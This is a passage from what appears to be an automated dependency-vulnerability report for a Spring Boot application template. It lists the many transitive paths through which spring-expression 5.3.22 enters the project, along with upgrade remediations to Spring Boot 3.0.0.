    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
